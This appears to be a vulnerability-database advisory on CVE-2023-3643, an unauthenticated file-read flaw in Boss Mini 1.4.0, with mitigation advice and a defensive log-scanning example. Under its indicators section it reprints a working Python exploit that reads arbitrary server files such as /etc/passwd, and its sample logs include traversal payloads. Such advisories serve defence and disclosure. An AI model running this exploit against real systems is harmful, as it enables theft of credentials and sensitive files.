Boss Mini v1.4.0 - Local File Inclusion (LFI)
Boss Mini version 1.4.0 suffers from a Local File Inclusion (LFI) vulnerability (CVE-2023-3643) that allows an attacker to read arbitrary files on the server by manipulating the 'path' parameter in a POST request to the /boss/servlet/document endpoint. Exploit code written in Python demonstrates how to send a crafted request to retrieve sensitive files such as /etc/passwd. The vulnerability does not require authentication and can be exploited remotely via HTTP requests. Successful exploitation can lead to disclosure of sensitive information, potentially aiding further attacks. No patches or mitigations are currently linked, and no known active exploitation in the wild has been reported. The exploit is medium severity due to its impact and ease of exploitation but limited to information disclosure without direct code execution. Organizations using Boss Mini 1.4.
AI Analysis
Technical Summary
The Boss Mini application version 1.4.0 contains a Local File Inclusion (LFI) vulnerability identified as CVE-2023-3643. This vulnerability exists in the handling of the 'path' parameter submitted via POST requests to the /boss/servlet/document endpoint. An attacker can manipulate this parameter to include and read arbitrary files from the server's filesystem. The provided exploit code, written in Python, uses the 'requests' library to send a crafted POST request with a URL-encoded file path, such as '/etc/passwd', to the vulnerable endpoint. The server responds with the contents of the requested file if the request is successful (HTTP 200). The exploit requires no authentication or user interaction, making it remotely exploitable. The vulnerability allows attackers to access sensitive configuration files, credentials, or other data that could facilitate further attacks such as privilege escalation or lateral movement. No official patches or fixes are referenced, and no active exploitation has been reported yet. The vulnerability is categorized as medium severity due to its potential impact on confidentiality and ease of exploitation but lacks direct code execution or system compromise capabilities on its own.
Potential Impact
The primary impact of this LFI vulnerability is unauthorized disclosure of sensitive files on affected servers running Boss Mini 1.4.0. Attackers can read configuration files, password files, application source code, or other sensitive data, which may contain credentials or secrets. This information leakage can enable further attacks such as privilege escalation, remote code execution via chained exploits, or lateral movement within a network. Organizations relying on Boss Mini for business-critical operations risk exposure of intellectual property, user data, and internal system details. The vulnerability's ease of exploitation without authentication increases the risk of automated scanning and mass exploitation attempts. Although no active exploitation is currently known, the availability of public exploit code lowers the barrier for attackers. The impact is significant for organizations with internet-facing Boss Mini deployments or insufficient network segmentation and monitoring.
Mitigation Recommendations
1. Immediately restrict access to the /boss/servlet/document endpoint using network controls such as firewalls or web application firewalls (WAF) to limit exposure to trusted IPs only.
2. Implement input validation and sanitization on the 'path' parameter to prevent directory traversal and file inclusion attacks.
3. If possible, upgrade Boss Mini to a version where this vulnerability is patched; if no patch exists, contact the vendor for guidance or apply custom fixes.
4. Employ runtime application self-protection (RASP) or host-based intrusion detection systems (HIDS) to detect and block suspicious file inclusion attempts.
5. Monitor logs for unusual requests targeting the vulnerable endpoint or attempts to access sensitive files.
6. Conduct a thorough audit of exposed files and credentials to identify any compromised data.
7. Segment and isolate the application server to minimize lateral movement in case of compromise.
8. Disable unnecessary file read permissions for the application process to limit accessible files.
9. Educate security teams about this vulnerability and ensure incident response plans include LFI attack scenarios.
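Recommendations 2 and 5 above, worked as an added example that is not part of this record or of the Boss Mini product: a path-confinement check for the 'path' parameter (decoding it the same way the public exploit encodes it) and a scan of constructed proxy-style log lines for POSTs to /boss/servlet/document whose path would escape the document root. The document root and the log line format are assumptions.

```python
import os
import re
from urllib.parse import unquote

# Hypothetical document root the servlet should be confined to (an assumption,
# not a real Boss Mini path).
DOC_ROOT = "/opt/bossmini/documents"

def is_safe_document_path(requested: str, doc_root: str = DOC_ROOT) -> bool:
    """True only if the decoded 'path' value resolves inside doc_root.
    The public exploit sends the path percent-encoded (quote(file, safe='')),
    so decode before checking; decoding twice also catches double encoding."""
    decoded = unquote(unquote(requested))
    if "\x00" in decoded or os.path.isabs(decoded) or decoded.startswith("\\"):
        return False
    root = os.path.realpath(doc_root)
    target = os.path.realpath(os.path.join(root, decoded))  # collapses '..'
    return target == root or target.startswith(root + os.sep)

# Constructed log format (an assumption): a reverse proxy or WAF that records
# the 'path' form field as  <ip> "<method> <uri>" path=<value> <status>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<uri>\S+)" path=(?P<path>\S*) (?P<status>\d{3})$'
)

def find_lfi_attempts(log_lines):
    """Return (ip, decoded path, status) for POSTs to /boss/servlet/document
    whose 'path' parameter would escape the document root."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["uri"] != "/boss/servlet/document":
            continue
        if not is_safe_document_path(m["path"]):
            hits.append((m["ip"], unquote(unquote(m["path"])), int(m["status"])))
    return hits

# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.10 "POST /boss/servlet/document" path=reports%2Fq1.pdf 200',
    '203.0.113.10 "POST /boss/servlet/document" path=%2Fetc%2Fpasswd 200',
    '198.51.100.7 "POST /boss/servlet/document" path=..%2F..%2F..%2Fetc%2Fpasswd 403',
    '198.51.100.7 "GET /boss/app/report/popup.html" path= 200',
]

if __name__ == "__main__":
    for ip, path, status in find_lfi_attempts(SAMPLE_LOG):
        print(f"LFI attempt from {ip}: path={path!r} status={status}")
```

A hit with status 200 means the server actually returned the file and should be treated as a confirmed disclosure, not just an attempt.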
Affected Countries
United States, Germany, India, Brazil, United Kingdom, France, Japan, Australia, Canada, Netherlands
Indicators of Compromise
- exploit-code:

# Exploit Title: Boss Mini v1.4.0 - Local File Inclusion (LFI)
# Date: 07/12/2023
# Exploit Author: nltt0
# Version: 1.4.0 (Build 6221)
# CVE: CVE-2023-3643

from requests import post
from urllib.parse import quote
from argparse import ArgumentParser

banner = r"""
 _____       _                              _____
/  __ \     | |                            /  ___|
| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--.
| |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
 \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/
                            __/ |
                           |___/

by nltt0 [https://github.com/nltt-br]
"""

print(banner)

try:
    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
    parser.add_argument('--domain', required=True, help='Application domain')
    parser.add_argument('--file', required=True, help='Local file')
    args = parser.parse_args()

    host = args.domain
    file = args.file

    url = '{}/boss/servlet/document'.format(host)
    file2 = quote(file, safe='')

    headers = {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
    }

    data = {
        'path': file2
    }

    try:
        req = post(url, headers=headers, data=data, verify=False)
        if req.status_code == 200:
            print(req.text)
    except Exception as e:
        print('Error in {}'.format(e))
except Exception as e:
    print('Error in {}'.format(e))
Technical Details
- Edb Id: 52482
- Has Exploit Code: true
- Code Language: python
Threat ID: 69a792c9d1a09e29cbc1c319
Added to database: 3/4/2026, 2:02:49 AM
Last enriched: 3/4/2026, 2:04:00 AM
Last updated: 3/4/2026, 7:44:49 AM